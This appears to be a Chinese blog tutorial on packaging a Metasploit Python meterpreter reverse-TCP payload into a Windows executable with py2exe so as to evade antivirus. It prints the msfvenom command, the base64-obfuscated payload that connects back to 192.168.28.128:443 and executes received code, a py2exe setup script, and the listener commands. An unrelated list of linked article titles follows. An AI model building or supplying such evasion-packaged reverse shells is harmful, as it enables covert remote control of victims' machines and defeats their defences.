很多渗透工具都提供了权限维持的能力，如Metasploit、Empire和Cobalt Strike，但是都会被防病毒软件检测到恶意行为。在探讨一个权限维持技巧的时候，似乎越来越多的人关注的是，这个方式会不会被被杀软杀掉？

打造免杀的payload成了一个很重要的话题，在这里，本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装Python 2.7.16 x86：https://www.python.org/ftp/python/2.7.16/python-2.7.16.msiPy2exe 32位：https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payloadmsfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

evil.py 代码如下：import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows，同时创建一个setup.py文件：from distutils.core import setupimport py2exesetup(name = 'Meter',description = 'Python-based App',version = '1.0',console=['evil.py'],options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},zipfile = None,)

下面的方法运行 evil.py，生成可执行文件。python ./setup.py py2exe

0x03 设置监听端口

Kali 运行Metasploit，设置监听：msfconsoleuse exploit/multi/handlerset PAYLOAD python/meterpreter/reverse_tcpset LHOST 192.168.28.128set LPORT 443run

在Windows中运行evil.exe，获得一个meterpreter的会话：

python打包的exe如何免杀_如何使用Python进行Payload免杀相关推荐

1. python如何将图片打包进exe里_史上最详细的Python打包成exe文件教程

   打包成exe文件可以让python代码在没有python环境的条件下,依然能够运行,实在是码农们写追女朋友表白.情人节浪漫的必需品! 1.使用豆瓣镜像源下载: pyinstaller 有需要了解如何使 ...

2. Python打包成exe文件_详细操作

   Python打包成exe文件 前言 一.安装pyinstaller 1.1 安装pyinstaller,使用安装命令: 1.2 如果遇到需要更新版本请输入: 1.3 检查是否正确安装 1.4 稍等,水 ...

3. 把python语言翻译出来_Python语言实现翻译小工具（Python打包成exe文件）

   本文主要向大家介绍了Python语言实现翻译小工具(Python打包成exe文件),通过具体的内容向大家展示,希望对大家学习Python语言有所帮助. 1.环境 windows10 python3.5 ...

4. python打包成.exe程序

   一.需求 有些时候,我们想做个带图形化界面的小工具用于pc端,使用MFC当然可以,java也有何不可,那么使用python呢?是否也可以把带有图形化界面的python程序打包成.exe程序?答案是肯定 ...

5. cmd python封装成exe_别再问我怎么Python打包成exe了！

   也许我们不一定是专业的程序员,但是我们仍然可以通过代码提高我们的效率,尽量少加班,多陪陪媳妇(如果有).再不行,让代码替我们干着重复的工作,我们有节省出来的时间打游戏不好嘛,是吧,哈哈哈. 但是呢,我 ...

6. Python打包成exe，pyc

   D:\mypython\path\ C:\Python27\Scripts\pyinstaller.exe -w mypython.py # Python打包成exe D:\mypython\path ...

7. python打包成.exe文件时出现“系统找不到指定路径”

   python打包成.exe文件时出现"系统找不到指定路径" 我在一开始写工程时就想到最后打包的时候可能会出现文件位置会发生移动,所以并没有使用绝对路径,而都是以相对路径写的程序. ...

8. Python打包成exe，文件太大问题解决办法

   Python打包成exe,文件太大问题解决办法 原因 解决办法 具体步骤 情况一:初次打包 情况二:再次打包 原因 由于使用pyinstaller打包.py文件时,会把很多已安装的无关库同时打包进去, ...

9. Python 打包的exe在Win7 不能运行的解决

   Python 打包的exe在Win7 不能运行的解决 原用PY3.8在WIN10下编写了一程序,结果大家都说WIN7运行不了,最后用虚拟机在WIN7+PY3.7环境下打包时,提示出错,发现原在PY3. ...

10. 【Python打包成exe】快速将多个py文件及其他文件打包为exe可执行文件

    使用概述: 尝试了很多种Python打包为exe可执行文件的方式,通过总结,得出一种最简洁.最有效的打包方式分享给大家! 步骤一(准备好安装文件): 准备好将要打包的工程文件(夹) 如上图所示,首先将 ...

最新文章

1. 案例式c语言程序设计陈明,C语言程序设计教程 清华大学出版社 陈明主编 第1章答案...
2. php三个数字比较大小排序,php中常用的4种实现数字大小排序的冒泡选择等算法函数代码...
3. 我的Java后端书架
4. 计算机技术与自动化期刊官网,计算技术与自动化是什么级别
5. 为什么html运行之后不滚动,为什么很多移动端的HTML UI，在滚动时都用transform属性而不是用传统的滚动条？...
6. Sublime Text 3 配置和使用方法
7. 三丰三坐标编程基本步骤_加工中心开机回零的两种基本方式及常见问题的应对方法...
8. Android-返回桌面？退出程序？
9. Machine Learning(Andrew)Week6(上)
10. BZOJ1057 [ZJOI2007]棋盘制作 【最大同色矩形】
11. photoshop设计精讲精练 学习笔记（一）
12. 手撸架构，Nginx 面试40问
13. 使用BENCHMARKSQL工具对kingbase灌数据执行语句删除这些外键时报错constraint does not exist
14. java多线程归并排序_并行计算实验-串、并行排序算法
15. 网络空间搜索引擎及常用的端口漏洞
16. oracle 10g alter system reset,《深入浅出Oracle》勘误表
17. 如何正确理解维度灾难
18. CMS 内容管理系统
19. 服务业数字化：乱中求序，避免数据垄断
20. PDF格式转换为WORD格式

热门文章

1. oracle的一些常使用命令,Oracle 经常使用命令小结
2. cnn输入层_多尺度CNN特征图的分析与应用
3. mysql count里面能加条件吗_select count(1) 和 count(*)，哪个性能更好？
4. Android fragmnet标签,在Android中为Fragment添加标签？
5. 'chcp' 不是内部或外部命令，也不是可运行的程序
6. 解决问题：Couldn't open file: data/coco.names
7. PyTorch框架学习十——基础网络层（卷积、转置卷积、池化、反池化、线性、激活函数）
8. Verilog HDL语言设计一个比较电路
9. 冈萨雷斯《数字图像处理》读书笔记（三）——空间滤波
10. 使用detours实现劫持